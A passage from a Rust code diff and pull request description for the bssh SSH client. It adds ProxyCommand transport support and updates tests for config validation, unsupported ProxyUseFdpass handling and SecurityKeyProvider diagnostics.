+        assert!(failure.command.contains("exit 42"));
+    }
+
+    #[test]
+    fn fdpass_is_rejected_before_spawn() {
+        let config = ProxyCommandConfig::new("echo unused", "target").with_fdpass(true);
+        let error = match spawn_proxy_command(&config, "target", 22, "alice") {
+            Ok(_) => panic!("ProxyUseFdpass must be rejected before spawn"),
+            Err(error) => error,
+        };
+        assert!(matches!(error, Error::ProxyUseFdpassUnsupported { .. }));
+    }
+}

--- a/tests/ssh_compat_output_test.rs
+++ b/tests/ssh_compat_output_test.rs
@@ -71,7 +71,7 @@ fn deprecated_alias_is_silent_and_unknown_keyword_uses_log_file() {
     let log = directory.path().join("bssh.log");
     fs::write(
         &config,
-        "Host *\n    ChallengeResponseAuthentication no\n    DefinitelyUnknownOption yes\n",
+        "Host *\n    ChallengeResponseAuthentication no\n    SecurityKeyProvider /usr/lib/ssh/ssh-sk-helper\n    DefinitelyUnknownOption yes\n",
     )
     .expect("ssh config should be written");
 
@@ -91,9 +91,14 @@ fn deprecated_alias_is_silent_and_unknown_keyword_uses_log_file() {
 
     assert!(!output.status.success());
     assert!(!String::from_utf8_lossy(&output.stderr).contains("ChallengeResponseAuthentication"));
+    assert!(!String::from_utf8_lossy(&output.stderr).contains("SecurityKeyProvider"));
 
     let diagnostics = fs::read_to_string(log).expect("diagnostic log should exist");
     assert!(!diagnostics.contains("ChallengeResponseAuthentication"));
+    assert!(
+        !diagnostics.contains("SecurityKeyProvider"),
+        "supported-but-unused OpenSSH option should not be diagnosed: {diagnostics:?}"
+    );
     let unknown = diagnostics
         .lines()
         .find(|line| line.contains("definitelyunknownoption"))
@@ -105,7 +110,7 @@ fn deprecated_alias_is_silent_and_unknown_keyword_uses_log_file() {
         });
     assert_eq!(
         unknown,
-        "Unknown SSH config option 'definitelyunknownoption' at line 4"
+        "Unknown SSH config option 'definitelyunknownoption' at line 5"
     );
     assert!(!unknown.contains("bssh::"));
 }

--- a/tests/ssh_config_command_options_advanced_test.rs
+++ b/tests/ssh_config_command_options_advanced_test.rs
@@ -248,22 +248,28 @@ Host test3
 }
 
 #[test]
-fn test_known_hosts_command_with_complex_url() {
-    let config = r#"
+fn test_known_hosts_command_complex_url_is_rejected() {
+    let rejected_config = r#"
 Host test1
     KnownHostsCommand curl -s "https://api.example.com/keys?host=%H&format=ssh"
+"#;
+    let error = SshConfig::parse(rejected_config).expect_err("curl URL must fail validation");
+    assert!(
+        format!("{error:#}").contains("KnownHostsCommand contains dangerous character '&'"),
+        "unexpected validation error: {error:#}"
+    );
 
+    let allowed_config = r#"
 Host test2
     KnownHostsCommand /opt/scripts/fetch-key.py --host=%h --port=%p
 "#;
-
-    let config_parsed = SshConfig::parse(config).unwrap();
+    let config_parsed = SshConfig::parse(allowed_config).unwrap();
     let hosts = config_parsed.hosts;
-    assert_eq!(hosts.len(), 2);
-
-    // Note: curl commands should fail validation due to dangerous chars
-    // but let's check parsing first
-    // Actually, the test3 in test_parse_known_hosts_command shows curl fails
+    assert_eq!(hosts.len(), 1);
+    assert_eq!(
+        hosts[0].known_hosts_command,
+        Some("/opt/scripts/fetch-key.py --host=%h --port=%p".to_string())
+    );
 }
 
 #[test]


### PR DESCRIPTION
## Summary

- Execute resolved `ProxyCommand` values as managed shell child transports instead of silently opening a direct target socket.
- Match OpenSSH proxy selection semantics across `ProxyCommand`, `ProxyJump`, command-line `-J`, explicit `none`, and effective `%h`/`%k`/`%n` token identities.
- Report bounded proxy stderr and exit status as actionable connection errors, and reject unsupported `ProxyUseFdpass` before spawning a process.

## Implementation

- Add a duplex async transport backed by child stdin/stdout with bounded stderr draining, exit monitoring, deterministic shutdown, and kill-on-drop lifecycle handling.
- Expand `%%`, `%h`, `%k`, `%n`, `%p`, and `%r`, reject malformed or unsupported tokens, and preserve shell pipes and quoting from trusted SSH configuration.
- Preserve the first-obtained SSH configuration semantics introduced by the related proxy and host-key changes, with command-line `-J` taking precedence.
- Silence only the official but unimplemented `SecurityKeyProvider` option while retaining diagnostics for genuinely unknown keywords.
- Preserve raw command exit codes after stdout and stderr and keep draining the SSH channel when the local output receiver closes, fixing integration failures exposed by the real proxy transport.
- Update user and manual documentation to describe the supported behavior and the explicit `ProxyUseFdpass` limitation.

## Security and quality review

- Reviewed shell-boundary validation, token expansion, direct-connection avoidance, child cleanup, stderr memory bounds, failure mapping, host-key alias identity, and early receiver-drop behavior; no unresolved CRITICAL or HIGH findings remain.
- Proxy commands remain an explicitly trusted SSH configuration shell boundary; target-derived tokens retain existing host and username validation, while NUL and newline injection and unsupported expansion tokens are rejected.

## Validation

- `cargo fmt --all -- --check`
- `cargo test --lib proxy` (29 passed)
- `cargo test --lib resolve_effective_jump_hosts` (11 passed)
- `cargo test --lib stream_exit` (2 passed)
- `cargo test --lib nonzero_stream_completion_preserves_remote_status` (1 passed)
- `cargo test --lib closed_output_receiver_is_not_a_command_error` (1 passed)
- `cargo test --test ssh_compat_output_test deprecated_alias_is_silent_and_unknown_keyword_uses_log_file -- --exact` (1 passed)
- `cargo check --lib --tests`
- `cargo clippy --lib --tests -- -D warnings`
- `cargo build --bin bssh`
- `cargo test --bin bssh` (57 passed)
- `TEST_SSH_UNSAFE_PERMISSIONS=1 python3 tests/openssh-regress/run.py --bssh target/debug/bssh --test proxy-connect --jobs 1 --timeout 120` (PASS, 1/1)

Local CI-equivalent note: `cargo test --tests -- --skip integration_test` passed the library tests (1420 passed, 9 ignored, 13 filtered), the bssh binary tests (57 passed), and the subsequent keygen/server and independent test targets until `tests/integration_test.rs`; three unchanged localhost SSH-dependent cases failed in the local harness (`test_localhost_multiple_file_upload`, `test_parallel_execution_with_multiple_nodes`, and `test_download_with_unique_filenames`). The PR's exact-head GitHub checks are the authoritative CI verdict for those environment-dependent cases.

Closes #280
